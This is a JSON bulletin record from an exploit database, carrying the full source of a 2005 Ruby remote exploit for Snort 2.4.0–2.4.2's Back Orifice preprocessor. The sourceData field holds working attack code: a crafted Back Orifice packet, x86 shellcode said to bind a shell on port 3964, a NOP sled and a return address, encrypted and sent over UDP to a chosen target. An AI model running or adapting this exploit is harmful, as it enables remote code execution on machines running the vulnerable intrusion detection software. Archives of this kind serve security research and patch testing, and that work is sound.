{"id": "EDB-ID:1314", "hash": "d902e64b927be42b57387e92614512eb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit 4", "description": "Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4). Remote exploit for linux platform", "published": "2005-11-11T00:00:00", "modified": "2005-11-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/1314/", "reporter": "xwings", "references": [], "cvelist": [], "lastseen": "2016-01-31T13:58:43", "history": [], "viewCount": 3, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-01-31T13:58:43"}, "dependencies": {"references": [], "modified": "2016-01-31T13:58:43"}, "vulnersScore": -0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1314/", "sourceData": "#!/usr/bin/ruby -w\n\n#\n#\n# Version 0.1 (Public)\n#\n# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit\n#\n# by xwings at mysec dot org\n# URL : http://www.mysec.org , somebody need to update the page\n# \n# Saying Hi to ....\n#\n# . All the 1337 c0d3r @ pulltheplug.org\n# . Gurus from #rubylang @ freenode.net\n# . Skywizard @ somewhere right now\n# . HITBSecConf CREW and Team Panda\n# \n# 03:07 <@mark> hey xwings\n# 03:07 <@mark> why don't you come up and see me sometime?\n#\n# Tested on :\n# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux\n# gcc version 3.3.5 (Debian 1:3.3.5-13)\n# Snort 2.4.2 , ./configure && make && make install\n#\n# Use Ruby : http://www.ruby-lang.org\n# \n# \n#\n\nrequire 'socket'\n\nfathost = ARGV[0]\npacketsize = 1069 # ret is 1069\ntargetport = 9080\n\nboheader = \"*!*QWTY?\" +\n [1096].pack(\"V\") + # Length ,thanx Russell Sanford\n \"\\xed\\xac\\xef\\x0d\"+ # ID\n \"\\x01\" # PING\n\n## Port Bind 3964 . connectback, refer to Russell Sanford's code\n\nshellcode = \"\\x31\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe8\"+\n \"\\x8e\\x30\\x01\\x83\\xeb\\xfc\\xe2\\xf4\\xd9\\x55\\x63\\x42\\xbb\\xe4\\x32\\x6b\"+\n \"\\x8e\\xd6\\xa9\\x88\\x09\\x43\\xb0\\x97\\xab\\xdc\\x56\\x69\\xe7\\xf2\\x56\\x52\"+\n \"\\x61\\x6f\\x5a\\x67\\xb0\\xde\\x61\\x57\\x61\\x6f\\xfd\\x81\\x58\\xe8\\xe1\\xe2\"+\n \"\\x25\\x0e\\x62\\x53\\xbe\\xcd\\xb9\\xe0\\x58\\xe8\\xfd\\x81\\x7b\\xe4\\x32\\x58\"+\n \"\\x58\\xb1\\xfd\\x81\\xa1\\xf7\\xc9\\xb1\\xe3\\xdc\\x58\\x2e\\xc7\\xfd\\x58\\x69\"+\n \"\\xc7\\xec\\x59\\x6f\\x61\\x6d\\x62\\x52\\x61\\x6f\\xfd\\x81\"\n\nfiller = \"\\x90\" * (packetsize-(boheader.length + shellcode.length))\n\nretadd = [0xbffff370].pack('L')\n\n \ndarthcode = (shellcode+filler+retadd)\n\ndef msrand(seed)\n @holdrand = 31337 \n end\n\ndef mrand()\n return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)\n end\n\ndef bocrypt(takepayload)\n\n @arrpayload = (takepayload.split(//))\n \n encpayload =\"\".to_s\n @holdrand=0\n msrand(0)\n \n @arrpayload.each do |c|\n encpayload +=((c.unpack(\"C*\").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr\n end\n \n return encpayload\n end\n\nUDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport)\n\n# milw0rm.com [2005-11-11]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{}